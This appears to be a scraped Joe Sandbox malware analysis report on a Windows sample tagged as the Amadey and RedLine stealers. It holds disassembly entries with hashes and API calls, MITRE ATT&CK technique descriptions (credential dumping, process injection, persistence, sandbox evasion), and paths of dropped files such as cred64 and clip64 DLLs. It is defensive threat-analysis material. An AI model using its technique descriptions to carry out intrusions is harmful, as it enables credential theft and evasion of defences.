String ID: NULL pointer access$Pointer does not support item deletion
API String ID: 3320257282-1262937747
Opcode ID: f94f962515928173b9621207c048e73b5289bcfd3c4acbcf380a64fa7c076c00
Instruction ID: 2c7598776ce26ae8758702d6907c3a07ce16de196560d54f8bb78700184e7c59
Opcode Fuzzy Hash: f94f962515928173b9621207c048e73b5289bcfd3c4acbcf380a64fa7c076c00
Instruction Fuzzy Hash: A4014CA2A08B8681EE44DF9AE4914B86768FBC6FD4B148132DF5E57BA6DF3CD550C300

Function 00007FF8BFB7EEAC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7EED9
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7EEF4

Strings

not a ctype instance, xrefs: 00007FF8BFB7EEEA

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_StringSubtypeType_
String ID: not a ctype instance
API String ID: 468607378-3181906287
Opcode ID: 08d198a72780ece662508876f4f51f37c6adf97046b3b81eb31e04160cb7e3f3
Instruction ID: 9ab8f65b42db5729d35775e339b45b8d5cef805d3c1252d435e0dd55611af60a
Opcode Fuzzy Hash: 08d198a72780ece662508876f4f51f37c6adf97046b3b81eb31e04160cb7e3f3
Instruction Fuzzy Hash: C70129A6A09B4691EB508FA9E4400787760FF88BD8B548931DF4D8BB69DF3CE490C300

Function 00007FF69002FA4C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF69002FA7C
GetDriveTypeW.KERNEL32 ref: 00007FF69002FABC

Strings

:, xrefs: 00007FF69002FAA5

Memory Dump Source

Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true

Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction ID: 80721f3ce00255171da745d508e03c87169964b126ac9a0681d06fc091adc004
Opcode Fuzzy Hash: 229dc5225c97c31120184e1c5c073253f760aebc87e6502baf4f3d3b6f3e4c47
Instruction Fuzzy Hash: E101A261A1C243A6FB30AF78946127E23A0EF58788F800075D64DC6799DF7CE506CA15

Function 00007FF8BFB7B28C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 31COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON38 ref: 00007FF8BFB7B2B7
_PyDict_SetItemId.PYTHON38 ref: 00007FF8BFB7B2E4

Strings

abstract class, xrefs: 00007FF8BFB7B2AD

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dict_Err_ItemString
String ID: abstract class
API String ID: 960913676-1623945838
Opcode ID: 07c45d1470a683c08f1dd7549840009edc2de2ed2696f7d1a0a357b19f8bdd29
Instruction ID: 3f7153ded6004e33bffd4b4049b76bb3ca8492fdc17a6c37690cf542ec8b49c5
Opcode Fuzzy Hash: 07c45d1470a683c08f1dd7549840009edc2de2ed2696f7d1a0a357b19f8bdd29
Instruction Fuzzy Hash: D0F04420A09B0780EA549FEDF8900792760AF85BD4B589631DB2E477E6DE2CE455C700

Function 00007FF8BFB7CEA8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

_PyDict_GetItemIdWithError.PYTHON38 ref: 00007FF8BFB7CEB8
PyErr_Occurred.PYTHON38 ref: 00007FF8BFB7CEC3

Strings

getting _needs_com_addref_, xrefs: 00007FF8BFB7CECE

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Dict_Err_ErrorItemOccurredWith
String ID: getting _needs_com_addref_
API String ID: 2359299079-4140119658
Opcode ID: 26c22734314908c9c5a6b304ba70b9f3844488a006614a608f28ba05d0495ae1
Instruction ID: b1d6db4d7ae71b17001d23bed0afc16b431f707aafcdbe9389a626131d5634f7
Opcode Fuzzy Hash: 26c22734314908c9c5a6b304ba70b9f3844488a006614a608f28ba05d0495ae1
Instruction Fuzzy Hash: 5CF0C992B1A64681FE699BDDD49417827A0EF88FC4B588439CB1D26761DE2CE894C314

Function 00007FF8BFB7DED4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON38 ref: 00007FF8BFB7DEED
PyErr_SetString.PYTHON38 ref: 00007FF8BFB7DF08

Strings

invalid type, xrefs: 00007FF8BFB7DEFE

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_StringSubtypeType_
String ID: invalid type
API String ID: 468607378-446110543
Opcode ID: 8368d9254fdd679526cd1a9d5725e2dd1d9492e1c54c901f5b1e911c6c4889d0
Instruction ID: de31844d016720c2575c8bde12507a7ec4c53838c96dcff797b3c21146f17ccd
Opcode Fuzzy Hash: 8368d9254fdd679526cd1a9d5725e2dd1d9492e1c54c901f5b1e911c6c4889d0
Instruction Fuzzy Hash: 7AF0ED61B0AA06C1EF149FAAE89007423A1FFC8FD4F445431CB1E8B651EE2CD4D5C304

Function 00007FF8BFB7408C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PyErr_Occurred.PYTHON38 ref: 00007FF8BFB78F2C
PyErr_SetString.PYTHON38 ref: 00007FF8BFB78F48

Strings

PyObject is NULL, xrefs: 00007FF8BFB78F3E

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Err_$OccurredString
String ID: PyObject is NULL
API String ID: 114435612-3221357749
Opcode ID: c3a842dcbd350af876c7cc5921dc1184f5b268ea4e277cc45085e60c13a99c40
Instruction ID: e0165e80148f28ebd18b6137ac6dbbfdb65da5977fafc47e12f0e2133e68aecf
Opcode Fuzzy Hash: c3a842dcbd350af876c7cc5921dc1184f5b268ea4e277cc45085e60c13a99c40
Instruction Fuzzy Hash: B4E0B620A0AA43C1EE159FADD88017827A0BF88BD5BA48836CB0E8A351EE2CF005C300

Function 00007FF8BFB7FCE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

PyCapsule_GetPointer.PYTHON38 ref: 00007FF8BFB7FCEB
PyMem_Free.PYTHON38 ref: 00007FF8BFB7FCF9

Strings

_ctypes/cfield.c pymem, xrefs: 00007FF8BFB7FCE4

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Capsule_FreeMem_Pointer
String ID: _ctypes/cfield.c pymem
API String ID: 1268649101-2578739719
Opcode ID: 09e8de93bb7fc27e010d1e423826d773f5fd79115a19586fecd86bd959678d95
Instruction ID: 27f50745aa19c0ba0568b8a77117bebdcc5d5021d2850e03df08ce00328702e5
Opcode Fuzzy Hash: 09e8de93bb7fc27e010d1e423826d773f5fd79115a19586fecd86bd959678d95
Instruction Fuzzy Hash: 6CC00260E2B642D2EE18ABDDB88512413A5AF84BC5F981434CA0D07666EE2CA659D714

Function 00007FF8BFB7E5C8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 9COMMON

Download Yara Rule

APIs

PyCapsule_GetPointer.PYTHON38 ref: 00007FF8BFB7E5D3
PyMem_Free.PYTHON38 ref: 00007FF8BFB7E5E1

Strings

_ctypes pymem, xrefs: 00007FF8BFB7E5CC

Memory Dump Source

Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true

Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd

Similarity

API ID: Capsule_FreeMem_Pointer
String ID: _ctypes pymem
API String ID: 1268649101-201515578
Opcode ID: 56aa39eb5979ff420b8f74c0b82c083b2a22dde05a45f10aad5266d7e5fd81f2
Instruction ID: 4966caed39c4f325125ffcae4739e615254cc905e54a92432b770cd047810e13
Opcode Fuzzy Hash: 56aa39eb5979ff420b8f74c0b82c083b2a22dde05a45f10aad5266d7e5fd81f2
Instruction Fuzzy Hash: 47C00250F1B64292EE18ABD9AC9552423617FC4BC5F881434D60E0A662EE2CA669C714

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Modification, Windows Registry: Windows Registry Key Modification
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting/hooking and modifying operating system API calls that supply system information.
Tactics:	Defense Evasion
Data Sources:	Drive: Drive Modification, File: File Modification, Firmware: Firmware Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report yINR7uQlPr.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\D7AB.tmp.ssg.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\ssg.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\update[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\clip64[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\ssg[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\cred64[1].dll

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\10000820101\update.exe

Windows Analysis Report
yINR7uQlPr.exe

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	Process: OS API Execution, Process: Process Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Containers, IaaS, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre